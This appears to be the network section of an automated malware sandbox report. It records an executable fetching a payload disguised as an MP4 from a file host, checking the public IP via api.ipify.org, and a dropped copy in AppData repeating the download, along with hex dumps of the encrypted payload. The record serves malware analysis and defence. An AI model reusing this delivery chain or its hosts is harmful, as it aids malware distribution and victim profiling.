                                                                                                          Dec 3, 2024 15:22:12.775857925 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:12.775909901 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:12.791866064 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:12.792026043 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:12.799987078 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:12.841814041 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:22.971051931 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:22.971069098 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:22.971158981 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:22.987412930 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:22.987423897 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:22.987528086 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:23.004411936 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:23.004515886 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:23.052197933 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:23.052277088 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:23.060899973 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:23.060970068 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:23.077588081 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:23.077671051 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:23.167517900 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:23.167666912 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:36.502686024 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:36.502809048 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:36.517194033 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:36.517285109 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:36.531810045 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:36.531905890 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:36.583066940 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:36.583154917 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:36.591993093 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:36.592051029 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:36.592081070 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:36.638685942 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:36.722229004 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:36.722244978 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:36.722357035 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:36.736731052 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:36.736829996 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:36.751753092 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:36.751847029 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:36.751858950 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:36.751894951 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:37.190186024 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:37.190356970 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:37.202346087 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:37.202439070 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:37.216792107 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:37.216947079 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:37.231214046 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:37.231328011 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:37.387207031 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:37.387305975 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:41.630227089 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:41.630362988 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:41.630441904 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:41.638093948 CET49973443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:41.638138056 CET443499735.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:41.638309002 CET49973443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:41.638641119 CET49973443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:41.638653994 CET443499735.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:43.460505962 CET443499735.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:43.460576057 CET49973443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:43.462867022 CET49973443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:43.462882042 CET443499735.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:43.463126898 CET443499735.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:43.464955091 CET49973443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:43.507334948 CET443499735.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:44.360671043 CET49979443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:44.360671997 CET49973443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:44.360707998 CET443499795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:44.360760927 CET443499735.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:44.360821962 CET49979443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:44.360857964 CET49973443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:44.361449957 CET49979443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:44.361471891 CET443499795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:45.896976948 CET49979443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:45.900167942 CET49984443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:45.900207996 CET443499845.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:45.900327921 CET49984443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:45.900692940 CET49984443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:45.900705099 CET443499845.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:45.939340115 CET443499795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:46.184010029 CET443499795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:46.184166908 CET443499795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:46.184288025 CET49979443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:46.184288025 CET49979443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:46.184288025 CET49979443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:47.725891113 CET443499845.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:47.726281881 CET49984443192.168.2.65.253.86.15
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 3, 2024 15:20:41.056732893 CET5021753192.168.2.61.1.1.1
                                                                                                          Dec 3, 2024 15:20:41.195964098 CET53502171.1.1.1192.168.2.6
                                                                                                          Dec 3, 2024 15:21:03.882945061 CET6537953192.168.2.61.1.1.1
                                                                                                          Dec 3, 2024 15:21:04.020481110 CET53653791.1.1.1192.168.2.6
                                                                                                          Dec 3, 2024 15:21:14.893758059 CET5907453192.168.2.61.1.1.1
                                                                                                          Dec 3, 2024 15:21:15.034282923 CET53590741.1.1.1192.168.2.6
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Dec 3, 2024 15:20:41.056732893 CET192.168.2.61.1.1.10xa654Standard query (0)oshi.atA (IP address)IN (0x0001)false
                                                                                                          Dec 3, 2024 15:21:03.882945061 CET192.168.2.61.1.1.10xee86Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 3, 2024 15:21:14.893758059 CET192.168.2.61.1.1.10xb2b0Standard query (0)oshi.atA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Dec 3, 2024 15:20:37.666531086 CET1.1.1.1192.168.2.60x50a0No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                          Dec 3, 2024 15:20:37.666531086 CET1.1.1.1192.168.2.60x50a0No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                          Dec 3, 2024 15:20:41.195964098 CET1.1.1.1192.168.2.60xa654No error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                                                                                                          Dec 3, 2024 15:20:41.195964098 CET1.1.1.1192.168.2.60xa654No error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false
                                                                                                          Dec 3, 2024 15:21:04.020481110 CET1.1.1.1192.168.2.60xee86No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                          Dec 3, 2024 15:21:04.020481110 CET1.1.1.1192.168.2.60xee86No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                          Dec 3, 2024 15:21:04.020481110 CET1.1.1.1192.168.2.60xee86No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                          Dec 3, 2024 15:21:15.034282923 CET1.1.1.1192.168.2.60xb2b0No error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false
                                                                                                          Dec 3, 2024 15:21:15.034282923 CET1.1.1.1192.168.2.60xb2b0No error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                                                                                                          • oshi.at
                                                                                                          • api.ipify.org
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.649715194.15.112.2484431012C:\Users\user\Desktop\Ref#60031796.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-03 14:20:43 UTC61OUTGET /Dwhm HTTP/1.1
                                                                                                          Host: oshi.at
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-03 14:20:44 UTC301INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Tue, 03 Dec 2024 14:20:44 GMT
                                                                                                          Content-Type: video/mp4
                                                                                                          Content-Length: 998920
                                                                                                          Connection: close
                                                                                                          Last-Modified: Tue, 03 Dec 2024 08:55:08 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          ETag: "8cf4633de198b56dd7b824d1999ae5f2"
                                                                                                          Content-Disposition: attachment; filename=ytCL.mp4
                                                                                                          2024-12-03 14:20:44 UTC3782INData Raw: 1d 14 b7 38 e6 77 1a 2f ec 3a 31 17 73 5e 28 60 d9 dc eb dd 4a 55 02 dc 82 fd 2f bf ef 0f bf eb ee c5 2f 26 d0 e0 30 94 2b 73 b7 bf 84 57 8d ba d8 b0 b5 fe e9 5a 05 af 86 ff 44 a3 88 98 ca 9a 96 89 e9 8e d2 f9 7e 25 bd 1d 7c df 22 54 ea 2a 17 85 c1 5b 8b aa 7f 5f 45 e1 64 91 5d 14 8b a7 cd 7d 74 63 65 85 f6 ac 31 b6 bf 8c d6 fc eb ad 99 65 ef be 76 b7 9d 91 27 f1 64 37 f3 be 60 a6 ce ff 69 31 1f 51 e6 2b f7 42 3d 44 33 5a c7 e7 da 6f 0b 86 cc d6 c4 8d 11 16 96 78 df 6c c6 b6 a5 8a 90 20 16 3c 88 39 0a 5c 0b fa 2f bc e4 24 7e f2 7b 32 67 df 64 b9 d2 71 dc 8c a5 9a c6 bc ac 60 7c 87 45 83 ca 3a 68 ac e5 95 17 79 3e 5e 8e f7 9f 53 c6 9c b2 00 fe b5 a7 2a 4b f6 9d da 24 d0 ac f0 e8 62 2d bc 6a e8 1a 19 b8 34 5f 13 da 06 a2 97 5f 96 cd 27 4d ec 55 3f 0d ec 4e
                                                                                                          Data Ascii: 8w/:1s^(`JU//&0+sWZD~%|"T*[_Ed]}tce1ev'd7`i1Q+B=D3Zoxl <9\/$~{2gdq`|E:hy>^S*K$b-j4__'MU?N
                                                                                                          2024-12-03 14:20:44 UTC4096INData Raw: e0 dc dc a2 10 8e ad dc 7b fe 3c 92 72 ed b8 fb a0 7f 48 38 ae d5 ab bc 9a aa fd 6f a3 a6 08 36 f7 58 5b 6b 8b f6 29 df 18 b8 a9 23 9e 8f 00 5a 12 63 cd 81 42 f6 5d 4f 02 de a4 7e 9d 91 26 9c f3 00 b5 52 77 05 58 70 0e b8 52 fc 3d f0 61 ca 7a bc 9d dd 59 69 dc c9 f9 56 f3 d0 a7 31 ec 76 10 8b 44 74 03 70 8e 09 a7 05 8a ba 14 62 89 a9 01 59 54 6d bb cf 7b e8 fc 39 4c 39 a1 97 fb 66 79 c3 f8 87 e5 5a 82 fc 22 29 9b 6e 9c 36 aa b0 73 0b 27 84 0b de db a3 7b 0f da 19 fb f2 8d b2 30 f5 0a 9b 4c e5 58 5a 76 72 c8 3c f9 a5 2e 02 6b c7 c5 8a d8 1c e2 9e a6 c1 ee 88 d9 d3 2a e0 43 56 ae 3f 4a 00 e4 bc d8 6c 26 39 b0 2b 57 2e bd 76 0e ec 05 53 03 e1 af 00 f2 42 95 8b 58 67 86 c1 8e fe 24 da d3 7e 17 55 32 b6 de 18 fc 16 6c 48 b0 ca 52 54 a1 d3 3e 41 39 60 4f 18 51
                                                                                                          Data Ascii: {<rH8o6X[k)#ZcB]O~&RwXpR=azYiV1vDtpbYTm{9L9fyZ")n6s'{0LXZvr<.k*CV?Jl&9+W.vSBXg$~U2lHRT>A9`OQ
                                                                                                          2024-12-03 14:20:44 UTC4096INData Raw: 79 42 7d 6b 09 d7 df 62 f4 b0 d6 a6 84 08 e0 72 79 e6 a7 44 e8 6f 30 80 88 26 25 68 ad ba de 09 4e 02 8c de 73 37 8b 6d 8e 66 6b 02 51 83 8e a9 d2 67 53 31 c0 23 55 b4 ba f5 dc 83 cf d7 d8 47 bf dd 1c 06 fd d6 21 d1 8f d9 4a 49 cc 43 51 78 f2 13 a8 6c e3 44 4b 71 6e f6 5d 7e 8d be 88 ae be 53 41 f8 3d c0 8c 48 53 a0 2d aa 8a fc 12 65 76 a7 c2 95 4d 85 fe a3 3e 44 84 5b 87 8b cb 87 03 22 79 07 cb c5 08 f7 74 8f 97 8a dc f6 de 70 ee 87 dd 7b fb 41 2f 06 31 25 b5 8b 4d 5a f4 0a dc 86 36 71 5f 91 14 ce 71 f3 ea d8 6e 32 b8 a3 f4 89 3f c8 aa 75 b7 cf 65 be fb da fb d0 db 4c 2e 31 c6 ef 59 dd d3 ac 66 74 1b 2b 7d 77 f4 77 ff 20 13 8a fe a4 33 54 88 7d b5 48 98 1c 52 e0 a9 a5 2a 90 4a 2f 28 99 03 7e 3a ef ce 09 79 ee d4 c0 ea 6c f1 ec 43 71 08 42 67 9f 60 ed 57
                                                                                                          Data Ascii: yB}kbryDo0&%hNs7mfkQgS1#UG!JICQxlDKqn]~SA=HS-evM>D["ytp{A/1%MZ6q_qn2?ueL.1Yft+}ww 3T}HR*J/(~:ylCqBg`W
                                                                                                          2024-12-03 14:20:44 UTC4096INData Raw: b3 44 43 c4 57 af b7 dd aa 68 a7 b4 62 79 fe 7f 6a d7 48 04 6b 7b bc bd b7 10 4f 83 ae 6f 28 f9 62 f2 46 ed b5 8c 62 80 ed 75 1e e5 b9 2f d4 3c da 92 fa 87 23 43 9d 9c d9 eb 91 74 b5 dd 71 29 22 a1 a0 88 0e 60 ed ed 46 fc 9d bb c0 0b ba 54 c4 52 88 d0 91 4f 03 e1 e4 14 f5 e8 b4 f5 50 82 93 ce 63 98 c1 42 3b f8 64 53 aa 79 ee 99 0c 74 2d 2d ba 45 ff fa 54 0a 5f 2d e1 d1 f1 ad 21 de 95 58 e2 bc 3e 61 0b c5 a1 67 17 61 98 55 28 a8 dd 9e 80 ea 1b f4 d7 c6 63 75 a4 c3 1b 83 1d 4d 40 67 61 ad 26 8c 66 86 ac aa 45 5d 2d d0 70 2d f6 2c 69 9a 60 06 c9 ad 40 10 5c 5d 0c 53 99 dc 3c f4 41 cf 39 1e 7d 98 e3 f3 3d 76 26 72 74 4c 33 34 12 d9 2c 16 98 e8 bf 7f 91 98 08 96 99 90 22 f2 85 01 1f f6 94 5e a4 e3 3a 4e 18 0c 3a 7f 15 1c 76 23 ee 4a df 8f 0f 81 91 9c ae ed 93
                                                                                                          Data Ascii: DCWhbyjHk{Oo(bFbu/<#Ctq)"`FTROPcB;dSyt--ET_-!X>agaU(cuM@ga&fE]-p-,i`@\]S<A9}=v&rtL34,"^:N:v#J
                                                                                                          2024-12-03 14:20:44 UTC4096INData Raw: b0 c7 38 fe 9e c5 1e 41 31 6c a8 98 d3 c6 dd 56 68 45 39 8b a0 4d f6 f6 dc 52 6a c7 59 89 5f 51 bc 71 17 dd c7 c9 2a ef 74 5e c5 a6 d5 c6 04 b6 da 08 30 ca aa b4 e3 ff 5b 91 fa ac cd e6 7e c6 93 0b 82 72 2d b7 f5 29 5c c7 c1 a9 e1 71 fe ac a0 8c 97 a5 9a 14 9d 6f 54 d6 d1 4f 7e be 8d 11 e1 ac 86 7c b0 e2 37 b2 f9 18 ef 3c 53 ea c4 7b 99 4d b5 24 33 75 f2 b9 2d 7f 5e 27 6d b5 d8 38 c6 b4 72 3e 0b 7b 39 0e 50 f8 e2 a2 a1 20 58 81 ea 4d 71 d8 27 32 33 f4 e0 38 fc 6b 2b ea 32 a4 d4 84 74 ac fa f3 b5 4a 8a 17 2e 6f 9b 2e 9d e2 8b 9e 07 25 8d 5f 9d ef 65 ff bd 3e ca 94 cf db 24 a2 94 f3 dc 0b 81 8c fb b0 e6 f2 1c e8 92 9f 06 a8 57 79 ce 22 ec d6 b4 6b 1f ba 5b 55 de 34 87 82 e5 e2 c8 ea 6b 6a c0 28 35 8b 5f 4f 8f c5 ea 30 c2 a3 74 b4 31 8d 8a a5 f2 c3 82 cf 3f
                                                                                                          Data Ascii: 8A1lVhE9MRjY_Qq*t^0[~r-)\qoTO~|7<S{M$3u-^'m8r>{9P XMq'238k+2tJ.o.%_e>$Wy"k[U4kj(5_O0t1?
                                                                                                          2024-12-03 14:20:44 UTC4096INData Raw: ab 2b 05 ff c0 ec 54 27 13 2e a6 4c 55 77 18 eb 11 62 73 33 04 c9 bc 19 0f 53 76 45 71 31 98 22 6d 39 4d 42 f9 08 a2 01 ed 6f 3b d1 82 fd 54 79 78 91 b2 6b 0c ab d2 84 7d c9 b9 32 86 e9 f9 a7 8f 7f a0 18 5a e7 c6 03 5d d0 9a d1 b2 f4 f1 88 76 06 1e a3 f6 49 18 ec 4b 43 38 05 de 92 b1 54 47 3c f4 4e 7c 2f 10 2b d0 9b f4 4c e0 92 58 1b d7 a1 51 d8 ee 45 93 d1 e8 e0 3f 33 4a 67 f5 e8 5c 86 95 35 ad 5b d3 5e 3a 2d bc 84 26 d5 fd d6 66 a8 4c dc 60 d5 c4 5b 89 4e 6f ef 76 95 ca 35 f4 33 5a 3d 4b 02 10 73 c0 13 f4 b3 95 0b 05 5a a8 0d f6 a6 e6 a2 83 b4 de aa 62 77 b4 8d 4e 25 f0 84 93 5c be d9 4c eb 30 69 8d cb f3 66 66 c9 e6 44 6e 20 40 26 da 20 2e f2 a3 ca ca c9 96 ac ad dd 2f 8d f5 aa 08 04 af 84 4a 63 50 0e 1f 37 c0 0f 16 6d e6 19 22 b0 a0 f9 ff 8e ac 45 20
                                                                                                          Data Ascii: +T'.LUwbs3SvEq1"m9MBo;Tyxk}2Z]vIKC8TG<N|/+LXQE?3Jg\5[^:-&fL`[Nov53Z=KsZbwN%\L0iffDn @& ./JcP7m"E
                                                                                                          2024-12-03 14:20:44 UTC4096INData Raw: 09 00 af 18 84 a3 de 03 22 fd 74 53 88 04 1b 99 eb 75 bc 79 e9 b9 94 cd 22 b7 04 7a b8 67 cb bf 2a d6 fa b1 06 e1 3a 0c 32 ab 2c 23 ab d1 f0 60 b1 ee 98 95 fd c7 62 f2 8f 8a ab 37 3c ff d0 11 84 91 f9 31 a0 16 0e da ff 40 ed ca d1 66 19 b0 68 d4 26 9f c8 f5 be f4 c3 36 89 bd f0 9f f6 16 64 35 e1 76 9a 1d 64 0f 42 db e6 c4 d4 af eb 5b 89 07 a5 58 15 2a 5b 31 e6 cf 83 e7 fe 0d df 83 5a 7c 1a 21 36 54 1f 26 fd 5b 58 a5 f2 07 30 8e ce b7 4d ae f9 72 b1 4e 7d 7a fa fa 3b e3 e7 51 5b 5c 90 98 ae 46 95 e1 d8 45 cf 57 34 d0 41 07 d3 9f 0c 88 ca 93 6a 97 ca a6 b8 1d 6c 6e 91 6c 25 fc 17 e0 cb 32 7b 04 f5 78 5d 3b e3 a3 0b 36 e7 79 10 6b 8f 3d b2 2e b0 d5 85 d9 b9 b7 5c 00 41 5c 63 5b 22 49 43 5e fc 28 9a 9a f7 f7 9f 44 44 f1 c8 f9 41 2b 07 5a 45 6c 2e c7 3a 8b 2e
                                                                                                          Data Ascii: "tSuy"zg*:2,#`b7<1@fh&6d5vdB[X*[1Z|!6T&[X0MrN}z;Q[\FEW4Ajlnl%2{x];6yk=.\A\c["IC^(DDA+ZEl.:.
                                                                                                          2024-12-03 14:20:44 UTC4096INData Raw: c6 77 da 94 ef d8 0b 85 94 43 fe fb 4b a6 27 1d a0 7a ac 84 bf 27 47 17 8c 3d a8 96 16 79 51 23 06 4b 8c 52 c5 34 bf b8 7d 68 94 4e d6 7c 67 d9 56 af f7 6a f7 0b f9 11 95 ea b5 1e 12 53 62 c5 b7 6d 40 00 fc 91 7c fb 60 e0 47 9a 4c 83 84 50 14 2a 99 33 15 87 7e 86 58 f8 1a 0c d6 f5 2a 12 61 83 53 64 37 e0 61 46 0d 75 d8 63 5e 1e f6 44 8f cf 3b f4 3f a0 9d 2e 1b 5e f9 e2 a4 27 47 90 26 af 9c bf 25 5c d8 cf e6 15 6c c3 6d c3 76 aa 2b 68 32 7f 7d da 7f f5 9b 0d 20 4c fb 37 23 3f 29 fd 1c bb e6 31 39 9a 71 73 75 5d 0e a7 2e c7 e0 ff 2d e6 3f 14 cd 9a 3c 0e 0e d4 09 34 32 d7 db 42 24 e1 4c 54 13 88 65 12 7c 82 7a 2d 29 3a 35 e9 ce 30 13 7d 25 a7 17 06 7e f7 c7 39 7b 68 79 6b bc f9 fb 79 18 d2 c6 6e 49 52 7d b4 5d f7 fc b1 54 23 a4 cd 7e 2d cb 07 76 ef a1 1e 65
                                                                                                          Data Ascii: wCK'z'G=yQ#KR4}hN|gVjSbm@|`GLP*3~X*aSd7aFuc^D;?.^'G&%\lmv+h2} L7#?)19qsu].-?<42B$LTe|z-):50}%~9{hykynIR}]T#~-ve
                                                                                                          2024-12-03 14:20:44 UTC676INData Raw: 0c f3 97 68 16 66 02 a0 cb 33 32 d4 11 1e ae c7 bd 4b 6e fa 92 a2 1e 6e fc 85 5e fe 16 b6 df a4 4a bb 7e 5d 98 14 24 9b 75 83 6f f5 51 63 69 85 82 02 d0 59 ed 79 fc f8 b7 8e ff 6e c0 db f3 fc ff 2a ed 77 92 18 17 29 ca d5 a0 40 e5 4f 37 82 39 20 37 76 69 f5 55 e0 ae a7 f6 ba af 76 c8 d3 0c 4a 55 46 f2 7f c1 f6 24 21 d0 05 11 0a c9 81 7a f8 9f 10 72 1b 73 e6 d9 15 74 a9 74 84 65 b4 1d 94 b9 85 c4 2d 77 89 79 63 56 2b a1 d4 9f fd 44 7a 14 b8 f1 f2 b1 d8 a2 22 04 b8 51 36 19 c2 47 0d ac 14 73 7e bd 84 9b f5 5c 7d a8 e4 c4 5c 1d 70 9b e2 ae 51 cc ba b1 46 60 9e 41 e6 e9 45 18 57 d9 d5 83 fa df c5 88 a1 7c b9 0a 1d 37 01 83 bb 50 f4 85 d4 5c 3c 12 a2 67 5a c3 e6 ce b5 6f 57 39 a5 0d 9b 4e 3c d4 65 38 92 e0 12 b7 fa 82 2c 1a 0f 79 55 e8 19 78 86 9b 04 64 09 bf
                                                                                                          Data Ascii: hf32Knn^J~]$uoQciYyn*w)@O79 7viUvJUF$!zrstte-wycV+Dz"Q6Gs~\}\pQF`AEW|7P\<gZoW9N<e8,yUxd
                                                                                                          2024-12-03 14:20:44 UTC4011INData Raw: d1 cc 05 df b3 cb aa c2 5c 07 d3 6f f7 45 b8 45 32 58 41 cf 62 1e 0f ca 4e 50 ef da 12 fa c9 0a 82 ff e4 a8 6f e7 31 5d a2 f2 12 3e 42 b8 e3 54 00 63 68 5f 11 80 50 f9 35 6c 9f bb 5c a1 55 3b 68 7d a8 cf 53 bf 68 c7 03 5e c8 b8 93 31 d5 51 72 2c 73 84 12 20 00 37 87 70 f7 97 23 aa 7b 05 4e 21 31 c6 6d 27 e9 a0 9d 3c 47 fa c2 ed 5a 3e af a6 7d 5d a7 89 a9 d9 b6 cd b3 1a 10 ea fc c4 99 71 0f 31 69 0d 4f 17 95 35 28 2c 8b b8 a3 ed 04 9c 77 4b 3d 25 92 ef 45 ba f9 25 0c e0 20 a0 a5 77 2a 83 2a ea 62 0d c5 e4 48 88 85 92 84 03 7f 43 26 1b db 3c c1 b9 ed e3 53 3a 8d 3c 15 0c 65 70 5e 86 2b b0 1d 5b c8 00 38 3a 24 73 eb c2 50 0b 69 d3 c1 b7 5d be 7f 0b 93 93 06 16 f3 4c f3 6b d0 c8 fe 68 71 21 1f cc fa d3 e1 85 22 9f f2 58 bd eb 03 e2 3a 38 e9 b7 61 2d 56 97 5f
                                                                                                          Data Ascii: \oEE2XAbNPo1]>BTch_P5l\U;h}Sh^1Qr,s 7p#{N!1m'<GZ>}]q1iO5(,wK=%E% w**bHC&<S:<ep^+[8:$sPi]Lkhq!"X:8a-V_


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.649751104.26.13.2054435716C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-03 14:21:05 UTC155OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                          Host: api.ipify.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-03 14:21:05 UTC424INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 03 Dec 2024 14:21:05 GMT
                                                                                                          Content-Type: text/plain
                                                                                                          Content-Length: 12
                                                                                                          Connection: close
                                                                                                          Vary: Origin
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ec4337f0a3b726e-EWR
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2006&min_rtt=1996&rtt_var=756&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1462925&cwnd=221&unsent_bytes=0&cid=dfa25d0697bc99d7&ts=663&x=0"
                                                                                                          2024-12-03 14:21:05 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                                                                                          Data Ascii: 8.46.123.228


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.6497795.253.86.154435504C:\Users\user\AppData\Roaming\vdvfyt.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-03 14:21:16 UTC61OUTGET /Dwhm HTTP/1.1
                                                                                                          Host: oshi.at
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-03 14:22:12 UTC301INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Tue, 03 Dec 2024 14:22:12 GMT
                                                                                                          Content-Type: video/mp4
                                                                                                          Content-Length: 998920
                                                                                                          Connection: close
                                                                                                          Accept-Ranges: bytes
                                                                                                          Last-Modified: Tue, 03 Dec 2024 08:55:08 GMT
                                                                                                          ETag: "8cf4633de198b56dd7b824d1999ae5f2"
                                                                                                          Content-Disposition: attachment; filename=ytCL.mp4
